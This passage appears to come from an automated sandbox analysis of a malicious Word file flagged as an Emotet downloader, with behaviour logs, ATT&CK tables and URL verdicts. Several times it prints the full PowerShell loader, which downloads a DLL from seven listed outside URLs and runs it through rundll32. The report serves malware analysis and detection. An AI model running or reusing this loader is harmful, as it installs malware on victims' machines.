    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -2767011611056431s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4825Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2541Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000006.00000003.727850715.0000000005892000.00000004.00000001.sdmpBinary or memory string: Hyper-V
    Source: powershell.exe, 00000006.00000003.749926662.0000000009B4A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'>f$
    Source: powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpBinary or memory string: c:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000006.00000003.750063979.000000000817F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Document contains VBA stomped code (only p-code) potentially bypassing AV detectionShow sources
    Source: 704.docOLE indicator, VBA stomping: true
    Source: ~DF0E259767A8C316A9.TMP.0.drOLE indicator, VBA stomping: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762 Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

    Stealing of Sensitive Information:

    barindex
    Yara detected Emotet DownloaderShow sources
    Source: Yara matchFile source: C:\Users\user\Documents\20211122\PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt, type: DROPPED

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScripting32Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSVirtualization/Sandbox Evasion21Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting32Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemSystem Information Discovery12Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Extra Window Memory Injection1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    704.doc100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\~DF0E259767A8C316A9.TMP100%Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://primtalent.com/wp-admin/9yt1u/0%Avira URL Cloudsafe
    http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/0%Avira URL Cloudsafe
    https://roaming.edog.0%URL Reputationsafe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/XnG/.Splitplits/0%Avira URL Cloudsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    http://huskysb.com40%Avira URL Cloudsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
    http://ckfoods.net/wp-admin/wPInm2rgMu/100%Avira URL Cloudmalware
    https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://api.aadrm.com0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/100%Avira URL Cloudmalware
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/100%Avira URL Cloudmalware
    https://apis.live.net/v5.0/0%URL Reputationsafe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/.Split/p0%Avira URL Cloudsafe
    http://huskysb.com/cgi-sys/suspendedpage.cgi0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/tp0%Avira URL Cloudsafe
    https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/deXnG/.Split.Split0%Avira URL Cloudsafe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/h0%Avira URL Cloudsafe
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    primtalent.com
    148.72.96.3
    truetrue
      unknown
      huskysb.com
      60.248.112.145
      truetrue
        unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://primtalent.com/wp-admin/9yt1u/true
        • Avira URL Cloud: safe
        unknown
        http://huskysb.com/cgi-sys/suspendedpage.cgifalse
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://api.diagnosticssdf.office.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
          high
          https://login.microsoftonline.com/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
            high
            https://shell.suite.office.com:1443ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
              high
              https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                high
                https://autodiscover-s.outlook.com/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                  high
                  http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/PowerShell_transcript.405464.2vRpjg5W.20211122132242.txt.6.drtrue
                  • Avira URL Cloud: safe
                  unknown
                  https://roaming.edog.ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                  • URL Reputation: safe
                  unknown
                  http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/XnG/.Splitplits/powershell.exe, 00000006.00000002.754189046.0000000005163000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                    high
                    https://cdn.entity.ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://api.addins.omex.office.net/appinfo/queryED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                      high
                      https://clients.config.office.net/user/v1.0/tenantassociationkeyED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                        high
                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                          high
                          https://powerlift.acompli.netED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://rpsticket.partnerservices.getmicrosoftkey.comED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://lookup.onenote.com/lookup/geolocation/v1ED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                            high
                            https://cortana.aiED19ABEB-CDF2-44DC-A6F4-0F73FB78CE80.0.drfalse
                            • URL Reputation: safe
                            unknown
